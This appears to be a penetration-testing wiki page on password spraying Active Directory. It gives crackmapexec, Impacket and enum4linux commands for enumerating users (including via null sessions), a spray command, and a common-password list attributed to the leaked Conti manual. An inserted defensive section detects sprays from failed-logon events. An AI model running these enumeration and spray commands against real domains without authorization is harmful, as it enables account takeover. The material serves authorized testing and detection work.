# Password Spraying

This section contains some of my methodology and tips for performing password spraying attacks against Active Directory. Before spraying, I highly recommend that you first [enumerate the password policy](/pentesting/infrastructure/active-directory/password-policy.md) on the domain so that you don't lock out accounts.

If you are looking to password spray external services to gain initial access, refer to the [Fortress section](/pentesting/fortress.md) of this GitBook.

### Get List of Users

```bash
# Get list of users and groups with CrackMapExec via a null session (unauthenticated)
crackmapexec smb $dc -u '' -p '' --users
crackmapexec smb $dc -u '' -p '' --groups

# Get list of users with CrackMapExec (authenticated)
crackmapexec smb $dc -u $username -p $password --users

# Get List of Users with Impacket
GetADUsers.py $domain/$username:$password -all -dc-ip $dc

# Get List of Users with Enum4linux
enum4linux $dc -u $username -p $password -U

# Extract and sort usernames from Enum4linux output saved to usernameenum.txt
grep "user" usernameenum.txt | awk '{print $1}' | cut -d '[' -f 2 | cut -d ']' -f 1 | sort -u -f > UsernameList.txt
```

### Spraying

```bash
# Spray with CrackMapExec
crackmapexec smb $ip -u $username_list -p Winter2022! --continue-on-success
```
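
Seen from the target's side, the spray above shows up as failed logons (Windows Event ID 4625) for many different accounts from one source within a short time. The detection logic below is an added example, not part of the original page; the record layout, the sample events and the thresholds (`min_users`, `window`) are constructed assumptions.

```python
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample: simplified failed-logon records (Windows Event ID 4625),
# one per line as "timestamp,event_id,target_user,source_ip". Not real logs.
SAMPLE_EVENTS = """\
2022-08-01T09:00:01,4625,alice,10.0.0.50
2022-08-01T09:00:02,4625,bob,10.0.0.50
2022-08-01T09:00:03,4625,carol,10.0.0.50
2022-08-01T09:00:04,4625,dave,10.0.0.50
2022-08-01T09:00:05,4625,erin,10.0.0.50
2022-08-01T09:10:00,4625,alice,10.0.0.77
2022-08-01T09:10:05,4625,alice,10.0.0.77
2022-08-01T09:10:09,4625,alice,10.0.0.77
2022-08-01T11:00:00,4625,frank,10.0.0.50
"""

def parse(lines):
    """Yield (time, user, source) for failed-logon records, skipping malformed lines."""
    for line in lines.splitlines():
        parts = line.strip().split(",")
        if len(parts) != 4 or parts[1] != "4625":
            continue
        try:
            ts = datetime.fromisoformat(parts[0])
        except ValueError:
            continue
        yield ts, parts[2].lower(), parts[3]

def detect_spray(lines, min_users=5, window=timedelta(minutes=5)):
    """Return {source: max distinct users failed within any window} for sources
    that reach min_users. Thresholds are assumed values; tune per environment."""
    recent = defaultdict(deque)   # source -> (time, user) pairs still inside the window
    flagged = {}
    for ts, user, src in sorted(parse(lines)):
        q = recent[src]
        q.append((ts, user))
        while q and ts - q[0][0] > window:
            q.popleft()           # drop failures older than the window
        distinct = len({u for _, u in q})
        if distinct >= min_users:
            flagged[src] = max(flagged.get(src, 0), distinct)
    return flagged

if __name__ == "__main__":
    for src, n in detect_spray(SAMPLE_EVENTS).items():
        print(f"possible password spray from {src}: {n} distinct accounts failed")
```

Repeated failures against a single account (the `10.0.0.77` records) are not flagged, because the rule keys on the number of distinct accounts per source rather than the raw failure count.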

### Password List

These passwords were taken from the published [Conti manual](https://github.com/ForbiddenProgrammer/conti-pentester-guide-leak) and often work. It should go without saying, but ensure that your list is tailored to each engagement (year, month, etc.).

```text
Password1
Hello123
password
Welcome1
Acme@1
training
Password123
job12345
food1234
June2022
July2022
August22
August2022
Summer22
Summer2022
June2022!
July2022!
August22!
August2022!
Summer22!
Summer2022!
```

### References

<https://wiki.porchetta.industries/smb-protocol/enumeration/enumerate-null-sessions>

